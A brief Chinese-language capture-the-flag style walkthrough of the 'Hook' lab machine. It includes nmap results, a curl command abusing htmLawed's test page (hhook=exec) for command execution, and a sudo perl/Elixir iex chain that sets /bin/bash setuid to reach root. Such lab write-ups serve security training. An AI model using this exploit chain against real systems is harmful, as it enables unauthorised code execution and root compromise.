# 靶场练习
下载:Hook
Nat,IP: 192.168.143
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0) | |
| ssh-hostkey: | |
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA) | |
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519) | |
80/tcp open http Apache httpd 2.4.59 ((Debian)) | |
|_http-title: Apache2 Debian Default Page: It works | |
|_http-server-header: Apache/2.4.59 (Debian) | |
| http-robots.txt: 1 disallowed entry | |
|_/htmLawed | |
4369/tcp open epmd Erlang Port Mapper Daemon | |
| epmd-info: | |
| epmd_port: 4369 | |
|_ nodes: |
80 口的 CMS 是 htmLawed
,搜出来 EXP,干。
curl -s -d 'sid=foo&hhook=exec&text=这里写CMD' -b 'sid=foo' http://localhost/vendor/htmlawed/htmlawed/htmLawedTest.php |egrep '\ \[[0-9]+\] =\>'| sed -E 's/\ \[[0-9]+\] =\> (.*)<br \/>/\1/' |
写一个 sh 传上去,运行拿到 shell
# 提权
sudo 滥用提权
www-data@hook:/var/www/html/htmLawed$ sudo -u noname perl -e 'exec "/bin/sh";' | |
noname@hook:/var/www/html/htmLawed$ sudo iex | |
Interactive Elixir (1.14.0) - press Ctrl+C to exit (type h() ENTER for help) | |
iex(1)> System.cmd("sudo",["chmod","+s","/bin/bash"]) | |
{"", 0} | |
iex(1)> ^C | |
BREAK: (a)bort (A)bort with dump (c)ontinue (p)roc info (i)nfo | |
(l)oaded (v)ersion (k)ill (D)b-tables (d)istribution | |
a | |
noname@hook:/var/www/html/htmLawed$ bash -p | |
bash-5.2# cat /root/root.txt | |
708883f44e1b0e57c8a501e176fad8a9 |
OK 了家人
# 小结
如何准确搜到 exp?